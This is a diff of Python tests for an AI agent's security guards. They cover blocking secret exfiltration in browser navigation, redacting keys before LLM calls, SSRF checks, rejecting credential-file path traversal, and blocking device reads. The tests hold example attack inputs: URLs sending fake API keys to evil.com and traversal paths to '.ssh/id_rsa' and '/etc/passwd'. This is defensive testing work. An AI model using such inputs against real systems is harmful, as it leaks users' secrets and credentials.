with patch.object(state, "get_hermes_home", return_value=tmp_path / "profile-a"):
|
||||
a = state.get_camofox_identity("task-1")
|
||||
with patch.object(state, "get_hermes_home", return_value=tmp_path / "profile-b"):
|
||||
b = state.get_camofox_identity("task-1")
|
||||
assert a["user_id"] != b["user_id"]
|
||||
|
||||
def test_default_task_id(self, tmp_path):
|
||||
state = _load_module()
|
||||
with patch.object(state, "get_hermes_home", return_value=tmp_path):
|
||||
identity = state.get_camofox_identity()
|
||||
assert "user_id" in identity
|
||||
assert "session_key" in identity
|
||||
assert identity["user_id"].startswith("hermes_")
|
||||
assert identity["session_key"].startswith("task_")
|
||||
|
||||
|
||||
class TestCamofoxConfigDefaults:
|
||||
def test_default_config_includes_managed_persistence_toggle(self):
|
||||
from hermes_cli.config import DEFAULT_CONFIG
|
||||
|
||||
browser_cfg = DEFAULT_CONFIG["browser"]
|
||||
assert browser_cfg["camofox"]["managed_persistence"] is False
|
||||
|
||||
def test_config_version_unchanged(self):
|
||||
from hermes_cli.config import DEFAULT_CONFIG
|
||||
|
||||
# managed_persistence is auto-merged by _deep_merge, no version bump needed
|
||||
assert DEFAULT_CONFIG["_config_version"] == 11
|
||||
186
tests/tools/test_browser_secret_exfil.py
Normal file
186
tests/tools/test_browser_secret_exfil.py
Normal file
|
|
@ -0,0 +1,186 @@
|
|||
"""Tests for secret exfiltration prevention in browser and web tools."""
|
||||
|
||||
import json
|
||||
from unittest.mock import patch, MagicMock
|
||||
import pytest
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _ensure_redaction_enabled(monkeypatch):
|
||||
"""Ensure redaction is active regardless of host HERMES_REDACT_SECRETS."""
|
||||
monkeypatch.delenv("HERMES_REDACT_SECRETS", raising=False)
|
||||
monkeypatch.setattr("agent.redact._REDACT_ENABLED", True)
|
||||
|
||||
|
||||
class TestBrowserSecretExfil:
|
||||
"""Verify browser_navigate blocks URLs containing secrets."""
|
||||
|
||||
def test_blocks_api_key_in_url(self):
|
||||
from tools.browser_tool import browser_navigate
|
||||
result = browser_navigate("https://evil.com/steal?key=" + "sk-" + "a" * 30)
|
||||
parsed = json.loads(result)
|
||||
assert parsed["success"] is False
|
||||
assert "API key" in parsed["error"] or "Blocked" in parsed["error"]
|
||||
|
||||
def test_blocks_openrouter_key_in_url(self):
|
||||
from tools.browser_tool import browser_navigate
|
||||
result = browser_navigate("https://evil.com/?token=" + "sk-or-v1-" + "b" * 30)
|
||||
parsed = json.loads(result)
|
||||
assert parsed["success"] is False
|
||||
|
||||
def test_allows_normal_url(self):
|
||||
"""Normal URLs pass the secret check (may fail for other reasons)."""
|
||||
from tools.browser_tool import browser_navigate
|
||||
result = browser_navigate("https://github.com/NousResearch/hermes-agent")
|
||||
parsed = json.loads(result)
|
||||
# Should NOT be blocked by secret detection
|
||||
assert "API key or token" not in parsed.get("error", "")
|
||||
|
||||
|
||||
class TestWebExtractSecretExfil:
|
||||
"""Verify web_extract_tool blocks URLs containing secrets."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_blocks_api_key_in_url(self):
|
||||
from tools.web_tools import web_extract_tool
|
||||
result = await web_extract_tool(
|
||||
urls=["https://evil.com/steal?key=" + "sk-" + "a" * 30]
|
||||
)
|
||||
parsed = json.loads(result)
|
||||
assert parsed["success"] is False
|
||||
assert "Blocked" in parsed["error"]
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_allows_normal_url(self):
|
||||
from tools.web_tools import web_extract_tool
|
||||
# This will fail due to no API key, but should NOT be blocked by secret check
|
||||
result = await web_extract_tool(urls=["https://example.com"])
|
||||
parsed = json.loads(result)
|
||||
# Should fail for API/config reason, not secret blocking
|
||||
assert "API key" not in parsed.get("error", "") or "Blocked" not in parsed.get("error", "")
|
||||
|
||||
|
||||
class TestBrowserSnapshotRedaction:
|
||||
"""Verify secrets in page snapshots are redacted before auxiliary LLM calls."""
|
||||
|
||||
def test_extract_relevant_content_redacts_secrets(self):
|
||||
"""Snapshot containing secrets should be redacted before call_llm."""
|
||||
from tools.browser_tool import _extract_relevant_content
|
||||
|
||||
# Build a snapshot with a fake Anthropic-style key embedded
|
||||
fake_key = "sk-" + "FAKESECRETVALUE1234567890ABCDEF"
|
||||
snapshot_with_secret = (
|
||||
"heading: Dashboard Settings\n"
|
||||
f"text: API Key: {fake_key}\n"
|
||||
"button [ref=e5]: Save\n"
|
||||
)
|
||||
|
||||
captured_prompts = []
|
||||
|
||||
def mock_call_llm(**kwargs):
|
||||
prompt = kwargs["messages"][0]["content"]
|
||||
captured_prompts.append(prompt)
|
||||
mock_resp = MagicMock()
|
||||
mock_resp.choices = [MagicMock()]
|
||||
mock_resp.choices[0].message.content = "Dashboard with save button [ref=e5]"
|
||||
return mock_resp
|
||||
|
||||
with patch("tools.browser_tool.call_llm", mock_call_llm):
|
||||
_extract_relevant_content(snapshot_with_secret, "check settings")
|
||||
|
||||
assert len(captured_prompts) == 1
|
||||
# The middle portion of the key must not appear in the prompt
|
||||
assert "FAKESECRETVALUE1234567890" not in captured_prompts[0]
|
||||
# Non-secret content should survive
|
||||
assert "Dashboard" in captured_prompts[0]
|
||||
assert "ref=e5" in captured_prompts[0]
|
||||
|
||||
def test_extract_relevant_content_no_task_redacts_secrets(self):
|
||||
"""Snapshot without user_task should also redact secrets."""
|
||||
from tools.browser_tool import _extract_relevant_content
|
||||
|
||||
fake_key = "sk-" + "ANOTHERFAKEKEY99887766554433"
|
||||
snapshot_with_secret = (
|
||||
f"text: OPENAI_API_KEY={fake_key}\n"
|
||||
"link [ref=e2]: Home\n"
|
||||
)
|
||||
|
||||
captured_prompts = []
|
||||
|
||||
def mock_call_llm(**kwargs):
|
||||
prompt = kwargs["messages"][0]["content"]
|
||||
captured_prompts.append(prompt)
|
||||
mock_resp = MagicMock()
|
||||
mock_resp.choices = [MagicMock()]
|
||||
mock_resp.choices[0].message.content = "Page with home link [ref=e2]"
|
||||
return mock_resp
|
||||
|
||||
with patch("tools.browser_tool.call_llm", mock_call_llm):
|
||||
_extract_relevant_content(snapshot_with_secret)
|
||||
|
||||
assert len(captured_prompts) == 1
|
||||
assert "ANOTHERFAKEKEY99887766" not in captured_prompts[0]
|
||||
|
||||
def test_extract_relevant_content_normal_snapshot_unchanged(self):
|
||||
"""Snapshot without secrets should pass through normally."""
|
||||
from tools.browser_tool import _extract_relevant_content
|
||||
|
||||
normal_snapshot = (
|
||||
"heading: Welcome\n"
|
||||
"text: Click the button below to continue\n"
|
||||
"button [ref=e1]: Continue\n"
|
||||
)
|
||||
|
||||
captured_prompts = []
|
||||
|
||||
def mock_call_llm(**kwargs):
|
||||
prompt = kwargs["messages"][0]["content"]
|
||||
captured_prompts.append(prompt)
|
||||
mock_resp = MagicMock()
|
||||
mock_resp.choices = [MagicMock()]
|
||||
mock_resp.choices[0].message.content = "Welcome page with continue button"
|
||||
return mock_resp
|
||||
|
||||
with patch("tools.browser_tool.call_llm", mock_call_llm):
|
||||
_extract_relevant_content(normal_snapshot, "proceed")
|
||||
|
||||
assert len(captured_prompts) == 1
|
||||
assert "Welcome" in captured_prompts[0]
|
||||
assert "Continue" in captured_prompts[0]
|
||||
|
||||
|
||||
class TestCamofoxAnnotationRedaction:
|
||||
"""Verify annotation context is redacted before vision LLM call."""
|
||||
|
||||
def test_annotation_context_secrets_redacted(self):
|
||||
"""Secrets in accessibility tree annotation should be masked."""
|
||||
from agent.redact import redact_sensitive_text
|
||||
|
||||
fake_token = "ghp_" + "FAKEGITHUBTOKEN12345678901234"
|
||||
annotation = (
|
||||
"\n\nAccessibility tree (element refs for interaction):\n"
|
||||
f"text: Token: {fake_token}\n"
|
||||
"button [ref=e3]: Copy\n"
|
||||
)
|
||||
result = redact_sensitive_text(annotation)
|
||||
assert "FAKEGITHUBTOKEN123456789" not in result
|
||||
# Non-secret parts preserved
|
||||
assert "button" in result
|
||||
assert "ref=e3" in result
|
||||
|
||||
def test_annotation_env_dump_redacted(self):
|
||||
"""Env var dump in annotation context should be redacted."""
|
||||
from agent.redact import redact_sensitive_text
|
||||
|
||||
fake_anth = "sk-" + "ant" + "-" + "ANTHROPICFAKEKEY123456789ABC"
|
||||
fake_oai = "sk-" + "proj" + "-" + "OPENAIFAKEKEY99887766554433"
|
||||
annotation = (
|
||||
"\n\nAccessibility tree (element refs for interaction):\n"
|
||||
f"text: ANTHROPIC_API_KEY={fake_anth}\n"
|
||||
f"text: OPENAI_API_KEY={fake_oai}\n"
|
||||
"text: PATH=/usr/local/bin\n"
|
||||
)
|
||||
result = redact_sensitive_text(annotation)
|
||||
assert "ANTHROPICFAKEKEY123456789" not in result
|
||||
assert "OPENAIFAKEKEY99887766" not in result
|
||||
assert "PATH=/usr/local/bin" in result
|
||||
237
tests/tools/test_browser_ssrf_local.py
Normal file
237
tests/tools/test_browser_ssrf_local.py
Normal file
|
|
@ -0,0 +1,237 @@
|
|||
"""Tests that browser_navigate SSRF checks respect local-backend mode and
|
||||
the allow_private_urls setting.
|
||||
|
||||
Local backends (Camofox, headless Chromium without a cloud provider) skip
|
||||
SSRF checks entirely — the agent already has full local-network access via
|
||||
the terminal tool.
|
||||
|
||||
Cloud backends (Browserbase, BrowserUse) enforce SSRF by default. Users
|
||||
can opt out for cloud mode via ``browser.allow_private_urls: true``.
|
||||
"""
|
||||
|
||||
import json
|
||||
|
||||
import pytest
|
||||
|
||||
from tools import browser_tool
|
||||
|
||||
|
||||
def _make_browser_result(url="https://example.com"):
|
||||
"""Return a mock successful browser command result."""
|
||||
return {"success": True, "data": {"title": "OK", "url": url}}
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Pre-navigation SSRF check
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestPreNavigationSsrf:
|
||||
PRIVATE_URL = "http://127.0.0.1:8080/dashboard"
|
||||
|
||||
@pytest.fixture()
|
||||
def _common_patches(self, monkeypatch):
|
||||
"""Shared patches for pre-navigation tests that pass the SSRF check."""
|
||||
monkeypatch.setattr(browser_tool, "_is_camofox_mode", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "check_website_access", lambda url: None)
|
||||
monkeypatch.setattr(
|
||||
browser_tool,
|
||||
"_get_session_info",
|
||||
lambda task_id: {
|
||||
"session_name": f"s_{task_id}",
|
||||
"bb_session_id": None,
|
||||
"cdp_url": None,
|
||||
"features": {"local": True},
|
||||
"_first_nav": False,
|
||||
},
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
browser_tool,
|
||||
"_run_browser_command",
|
||||
lambda *a, **kw: _make_browser_result(),
|
||||
)
|
||||
|
||||
# -- Cloud mode: SSRF active -----------------------------------------------
|
||||
|
||||
def test_cloud_blocks_private_url_by_default(self, monkeypatch, _common_patches):
|
||||
"""SSRF protection blocks private URLs in cloud mode."""
|
||||
monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: False)
|
||||
|
||||
result = json.loads(browser_tool.browser_navigate(self.PRIVATE_URL))
|
||||
|
||||
assert result["success"] is False
|
||||
assert "private or internal address" in result["error"]
|
||||
|
||||
def test_cloud_allows_private_url_when_setting_true(self, monkeypatch, _common_patches):
|
||||
"""Private URLs pass in cloud mode when allow_private_urls is True."""
|
||||
monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: True)
|
||||
monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: False)
|
||||
|
||||
result = json.loads(browser_tool.browser_navigate(self.PRIVATE_URL))
|
||||
|
||||
assert result["success"] is True
|
||||
|
||||
def test_cloud_allows_public_url(self, monkeypatch, _common_patches):
|
||||
"""Public URLs always pass in cloud mode."""
|
||||
monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: True)
|
||||
|
||||
result = json.loads(browser_tool.browser_navigate("https://example.com"))
|
||||
|
||||
assert result["success"] is True
|
||||
|
||||
# -- Local mode: SSRF skipped ----------------------------------------------
|
||||
|
||||
def test_local_allows_private_url(self, monkeypatch, _common_patches):
|
||||
"""Local backends skip SSRF — private URLs are always allowed."""
|
||||
monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: True)
|
||||
monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: False)
|
||||
|
||||
result = json.loads(browser_tool.browser_navigate(self.PRIVATE_URL))
|
||||
|
||||
assert result["success"] is True
|
||||
|
||||
def test_local_allows_public_url(self, monkeypatch, _common_patches):
|
||||
"""Local backends pass public URLs too (sanity check)."""
|
||||
monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: True)
|
||||
monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: True)
|
||||
|
||||
result = json.loads(browser_tool.browser_navigate("https://example.com"))
|
||||
|
||||
assert result["success"] is True
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# _is_local_backend() unit tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestIsLocalBackend:
|
||||
def test_camofox_is_local(self, monkeypatch):
|
||||
"""Camofox mode counts as a local backend."""
|
||||
monkeypatch.setattr(browser_tool, "_is_camofox_mode", lambda: True)
|
||||
monkeypatch.setattr(browser_tool, "_get_cloud_provider", lambda: "anything")
|
||||
|
||||
assert browser_tool._is_local_backend() is True
|
||||
|
||||
def test_no_cloud_provider_is_local(self, monkeypatch):
|
||||
"""No cloud provider configured → local backend."""
|
||||
monkeypatch.setattr(browser_tool, "_is_camofox_mode", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "_get_cloud_provider", lambda: None)
|
||||
|
||||
assert browser_tool._is_local_backend() is True
|
||||
|
||||
def test_cloud_provider_is_not_local(self, monkeypatch):
|
||||
"""Cloud provider configured and not Camofox → NOT local."""
|
||||
monkeypatch.setattr(browser_tool, "_is_camofox_mode", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "_get_cloud_provider", lambda: "bb")
|
||||
|
||||
assert browser_tool._is_local_backend() is False
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Post-redirect SSRF check
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestPostRedirectSsrf:
|
||||
PUBLIC_URL = "https://example.com/redirect"
|
||||
PRIVATE_FINAL_URL = "http://192.168.1.1/internal"
|
||||
|
||||
@pytest.fixture()
|
||||
def _common_patches(self, monkeypatch):
|
||||
"""Shared patches for redirect tests."""
|
||||
monkeypatch.setattr(browser_tool, "_is_camofox_mode", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "check_website_access", lambda url: None)
|
||||
monkeypatch.setattr(
|
||||
browser_tool,
|
||||
"_get_session_info",
|
||||
lambda task_id: {
|
||||
"session_name": f"s_{task_id}",
|
||||
"bb_session_id": None,
|
||||
"cdp_url": None,
|
||||
"features": {"local": True},
|
||||
"_first_nav": False,
|
||||
},
|
||||
)
|
||||
|
||||
# -- Cloud mode: redirect SSRF active --------------------------------------
|
||||
|
||||
def test_cloud_blocks_redirect_to_private(self, monkeypatch, _common_patches):
|
||||
"""Redirects to private addresses are blocked in cloud mode."""
|
||||
monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
|
||||
monkeypatch.setattr(
|
||||
browser_tool, "_is_safe_url", lambda url: "192.168" not in url,
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
browser_tool,
|
||||
"_run_browser_command",
|
||||
lambda *a, **kw: _make_browser_result(url=self.PRIVATE_FINAL_URL),
|
||||
)
|
||||
|
||||
result = json.loads(browser_tool.browser_navigate(self.PUBLIC_URL))
|
||||
|
||||
assert result["success"] is False
|
||||
assert "redirect landed on a private/internal address" in result["error"]
|
||||
|
||||
def test_cloud_allows_redirect_to_private_when_setting_true(self, monkeypatch, _common_patches):
|
||||
"""Redirects to private addresses pass in cloud mode with allow_private_urls."""
|
||||
monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: True)
|
||||
monkeypatch.setattr(
|
||||
browser_tool, "_is_safe_url", lambda url: "192.168" not in url,
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
browser_tool,
|
||||
"_run_browser_command",
|
||||
lambda *a, **kw: _make_browser_result(url=self.PRIVATE_FINAL_URL),
|
||||
)
|
||||
|
||||
result = json.loads(browser_tool.browser_navigate(self.PUBLIC_URL))
|
||||
|
||||
assert result["success"] is True
|
||||
assert result["url"] == self.PRIVATE_FINAL_URL
|
||||
|
||||
# -- Local mode: redirect SSRF skipped -------------------------------------
|
||||
|
||||
def test_local_allows_redirect_to_private(self, monkeypatch, _common_patches):
|
||||
"""Redirects to private addresses pass in local mode."""
|
||||
monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: True)
|
||||
monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
|
||||
monkeypatch.setattr(
|
||||
browser_tool, "_is_safe_url", lambda url: "192.168" not in url,
|
||||
)
|
||||
monkeypatch.setattr(
|
||||
browser_tool,
|
||||
"_run_browser_command",
|
||||
lambda *a, **kw: _make_browser_result(url=self.PRIVATE_FINAL_URL),
|
||||
)
|
||||
|
||||
result = json.loads(browser_tool.browser_navigate(self.PUBLIC_URL))
|
||||
|
||||
assert result["success"] is True
|
||||
assert result["url"] == self.PRIVATE_FINAL_URL
|
||||
|
||||
def test_cloud_allows_redirect_to_public(self, monkeypatch, _common_patches):
|
||||
"""Redirects to public addresses always pass (cloud mode)."""
|
||||
final = "https://example.com/final"
|
||||
monkeypatch.setattr(browser_tool, "_is_local_backend", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "_allow_private_urls", lambda: False)
|
||||
monkeypatch.setattr(browser_tool, "_is_safe_url", lambda url: True)
|
||||
monkeypatch.setattr(
|
||||
browser_tool,
|
||||
"_run_browser_command",
|
||||
lambda *a, **kw: _make_browser_result(url=final),
|
||||
)
|
||||
|
||||
result = json.loads(browser_tool.browser_navigate(self.PUBLIC_URL))
|
||||
|
||||
assert result["success"] is True
|
||||
assert result["url"] == final
|
||||
|
|
@ -197,3 +197,164 @@ class TestIterSkillsFiles:
|
|||
|
||||
with patch.dict(os.environ, {"HERMES_HOME": str(hermes_home)}):
|
||||
assert iter_skills_files() == []
|
||||
|
||||
class TestPathTraversalSecurity:
|
||||
"""Path traversal and absolute path rejection.
|
||||
|
||||
A malicious skill could declare::
|
||||
|
||||
required_credential_files:
|
||||
- path: '../../.ssh/id_rsa'
|
||||
|
||||
Without containment checks, this would mount the host's SSH private key
|
||||
into the container sandbox, leaking it to the skill's execution environment.
|
||||
"""
|
||||
|
||||
def test_dotdot_traversal_rejected(self, tmp_path, monkeypatch):
|
||||
"""'../sensitive' must not escape HERMES_HOME."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / ".hermes"))
|
||||
(tmp_path / ".hermes").mkdir()
|
||||
|
||||
# Create a sensitive file one level above hermes_home
|
||||
sensitive = tmp_path / "sensitive.json"
|
||||
sensitive.write_text('{"secret": "value"}')
|
||||
|
||||
result = register_credential_file("../sensitive.json")
|
||||
|
||||
assert result is False
|
||||
assert get_credential_file_mounts() == []
|
||||
|
||||
def test_deep_traversal_rejected(self, tmp_path, monkeypatch):
|
||||
"""'../../etc/passwd' style traversal must be rejected."""
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
# Create a fake sensitive file outside hermes_home
|
||||
ssh_dir = tmp_path / ".ssh"
|
||||
ssh_dir.mkdir()
|
||||
(ssh_dir / "id_rsa").write_text("PRIVATE KEY")
|
||||
|
||||
result = register_credential_file("../../.ssh/id_rsa")
|
||||
|
||||
assert result is False
|
||||
assert get_credential_file_mounts() == []
|
||||
|
||||
def test_absolute_path_rejected(self, tmp_path, monkeypatch):
|
||||
"""Absolute paths must be rejected regardless of whether they exist."""
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
# Create a file at an absolute path
|
||||
sensitive = tmp_path / "absolute.json"
|
||||
sensitive.write_text("{}")
|
||||
|
||||
result = register_credential_file(str(sensitive))
|
||||
|
||||
assert result is False
|
||||
assert get_credential_file_mounts() == []
|
||||
|
||||
def test_legitimate_file_still_works(self, tmp_path, monkeypatch):
|
||||
"""Normal files inside HERMES_HOME must still be registered."""
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
(hermes_home / "token.json").write_text('{"token": "abc"}')
|
||||
|
||||
result = register_credential_file("token.json")
|
||||
|
||||
assert result is True
|
||||
mounts = get_credential_file_mounts()
|
||||
assert len(mounts) == 1
|
||||
assert "token.json" in mounts[0]["container_path"]
|
||||
|
||||
def test_nested_subdir_inside_hermes_home_allowed(self, tmp_path, monkeypatch):
|
||||
"""Files in subdirectories of HERMES_HOME must be allowed."""
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
subdir = hermes_home / "creds"
|
||||
subdir.mkdir()
|
||||
(subdir / "oauth.json").write_text("{}")
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
result = register_credential_file("creds/oauth.json")
|
||||
|
||||
assert result is True
|
||||
|
||||
def test_symlink_traversal_rejected(self, tmp_path, monkeypatch):
|
||||
"""A symlink inside HERMES_HOME pointing outside must be rejected."""
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
# Create a sensitive file outside hermes_home
|
||||
sensitive = tmp_path / "sensitive.json"
|
||||
sensitive.write_text('{"secret": "value"}')
|
||||
|
||||
# Create a symlink inside hermes_home pointing outside
|
||||
symlink = hermes_home / "evil_link.json"
|
||||
try:
|
||||
symlink.symlink_to(sensitive)
|
||||
except (OSError, NotImplementedError):
|
||||
pytest.skip("Symlinks not supported on this platform")
|
||||
|
||||
result = register_credential_file("evil_link.json")
|
||||
|
||||
# The resolved path escapes HERMES_HOME — must be rejected
|
||||
assert result is False
|
||||
assert get_credential_file_mounts() == []
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Config-based credential files — same containment checks
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestConfigPathTraversal:
|
||||
"""terminal.credential_files in config.yaml must also reject traversal."""
|
||||
|
||||
def _write_config(self, hermes_home: Path, cred_files: list):
|
||||
import yaml
|
||||
config_path = hermes_home / "config.yaml"
|
||||
config_path.write_text(yaml.dump({"terminal": {"credential_files": cred_files}}))
|
||||
|
||||
def test_config_traversal_rejected(self, tmp_path, monkeypatch):
|
||||
"""'../secret' in config.yaml must not escape HERMES_HOME."""
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
sensitive = tmp_path / "secret.json"
|
||||
sensitive.write_text("{}")
|
||||
self._write_config(hermes_home, ["../secret.json"])
|
||||
|
||||
mounts = get_credential_file_mounts()
|
||||
host_paths = [m["host_path"] for m in mounts]
|
||||
assert str(sensitive) not in host_paths
|
||||
assert str(sensitive.resolve()) not in host_paths
|
||||
|
||||
def test_config_absolute_path_rejected(self, tmp_path, monkeypatch):
|
||||
"""Absolute paths in config.yaml must be rejected."""
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
sensitive = tmp_path / "abs.json"
|
||||
sensitive.write_text("{}")
|
||||
self._write_config(hermes_home, [str(sensitive)])
|
||||
|
||||
mounts = get_credential_file_mounts()
|
||||
assert mounts == []
|
||||
|
||||
def test_config_legitimate_file_works(self, tmp_path, monkeypatch):
|
||||
"""Normal files inside HERMES_HOME via config must still mount."""
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
(hermes_home / "oauth.json").write_text("{}")
|
||||
self._write_config(hermes_home, ["oauth.json"])
|
||||
|
||||
mounts = get_credential_file_mounts()
|
||||
assert len(mounts) == 1
|
||||
assert "oauth.json" in mounts[0]["container_path"]
|
||||
|
|
|
|||
|
|
@ -593,7 +593,14 @@ class TestDelegationCredentialResolution(unittest.TestCase):
|
|||
"model": "qwen2.5-coder",
|
||||
"base_url": "http://localhost:1234/v1",
|
||||
}
|
||||
with patch.dict(os.environ, {"OPENROUTER_API_KEY": "env-openrouter-key"}, clear=False):
|
||||
with patch.dict(
|
||||
os.environ,
|
||||
{
|
||||
"OPENROUTER_API_KEY": "env-openrouter-key",
|
||||
"OPENAI_API_KEY": "",
|
||||
},
|
||||
clear=False,
|
||||
):
|
||||
with self.assertRaises(ValueError) as ctx:
|
||||
_resolve_delegation_credentials(cfg, parent)
|
||||
self.assertIn("OPENAI_API_KEY", str(ctx.exception))
|
||||
|
|
|
|||
378
tests/tools/test_file_read_guards.py
Normal file
378
tests/tools/test_file_read_guards.py
Normal file
|
|
@ -0,0 +1,378 @@
|
|||
#!/usr/bin/env python3
|
||||
"""
|
||||
Tests for read_file_tool safety guards: device-path blocking,
|
||||
character-count limits, file deduplication, and dedup reset on
|
||||
context compression.
|
||||
|
||||
Run with: python -m pytest tests/tools/test_file_read_guards.py -v
|
||||
"""
|
||||
|
||||
import json
|
||||
import os
|
||||
import tempfile
|
||||
import time
|
||||
import unittest
|
||||
from unittest.mock import patch, MagicMock
|
||||
|
||||
from tools.file_tools import (
|
||||
read_file_tool,
|
||||
clear_read_tracker,
|
||||
reset_file_dedup,
|
||||
_is_blocked_device,
|
||||
_get_max_read_chars,
|
||||
_DEFAULT_MAX_READ_CHARS,
|
||||
)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class _FakeReadResult:
|
||||
"""Minimal stand-in for FileOperations.read_file return value."""
|
||||
def __init__(self, content="line1\nline2\n", total_lines=2, file_size=100):
|
||||
self.content = content
|
||||
self._total_lines = total_lines
|
||||
self._file_size = file_size
|
||||
|
||||
def to_dict(self):
|
||||
return {
|
||||
"content": self.content,
|
||||
"total_lines": self._total_lines,
|
||||
"file_size": self._file_size,
|
||||
}
|
||||
|
||||
|
||||
def _make_fake_ops(content="hello\n", total_lines=1, file_size=6):
|
||||
fake = MagicMock()
|
||||
fake.read_file = lambda path, offset=1, limit=500: _FakeReadResult(
|
||||
content=content, total_lines=total_lines, file_size=file_size,
|
||||
)
|
||||
return fake
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Device path blocking
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestDevicePathBlocking(unittest.TestCase):
|
||||
"""Paths like /dev/zero should be rejected before any I/O."""
|
||||
|
||||
def test_blocked_device_detection(self):
|
||||
for dev in ("/dev/zero", "/dev/random", "/dev/urandom", "/dev/stdin",
|
||||
"/dev/tty", "/dev/console", "/dev/stdout", "/dev/stderr",
|
||||
"/dev/fd/0", "/dev/fd/1", "/dev/fd/2"):
|
||||
self.assertTrue(_is_blocked_device(dev), f"{dev} should be blocked")
|
||||
|
||||
def test_safe_device_not_blocked(self):
|
||||
self.assertFalse(_is_blocked_device("/dev/null"))
|
||||
self.assertFalse(_is_blocked_device("/dev/sda1"))
|
||||
|
||||
def test_proc_fd_blocked(self):
|
||||
self.assertTrue(_is_blocked_device("/proc/self/fd/0"))
|
||||
self.assertTrue(_is_blocked_device("/proc/12345/fd/2"))
|
||||
|
||||
def test_proc_fd_other_not_blocked(self):
|
||||
self.assertFalse(_is_blocked_device("/proc/self/fd/3"))
|
||||
self.assertFalse(_is_blocked_device("/proc/self/maps"))
|
||||
|
||||
def test_normal_files_not_blocked(self):
|
||||
self.assertFalse(_is_blocked_device("/tmp/test.py"))
|
||||
self.assertFalse(_is_blocked_device("/home/user/.bashrc"))
|
||||
|
||||
def test_read_file_tool_rejects_device(self):
|
||||
"""read_file_tool returns an error without any file I/O."""
|
||||
result = json.loads(read_file_tool("/dev/zero", task_id="dev_test"))
|
||||
self.assertIn("error", result)
|
||||
self.assertIn("device file", result["error"])
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Character-count limits
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestCharacterCountGuard(unittest.TestCase):
|
||||
"""Large reads should be rejected with guidance to use offset/limit."""
|
||||
|
||||
def setUp(self):
|
||||
clear_read_tracker()
|
||||
|
||||
def tearDown(self):
|
||||
clear_read_tracker()
|
||||
|
||||
@patch("tools.file_tools._get_file_ops")
|
||||
@patch("tools.file_tools._get_max_read_chars", return_value=_DEFAULT_MAX_READ_CHARS)
|
||||
def test_oversized_read_rejected(self, _mock_limit, mock_ops):
|
||||
"""A read that returns >max chars is rejected."""
|
||||
big_content = "x" * (_DEFAULT_MAX_READ_CHARS + 1)
|
||||
mock_ops.return_value = _make_fake_ops(
|
||||
content=big_content,
|
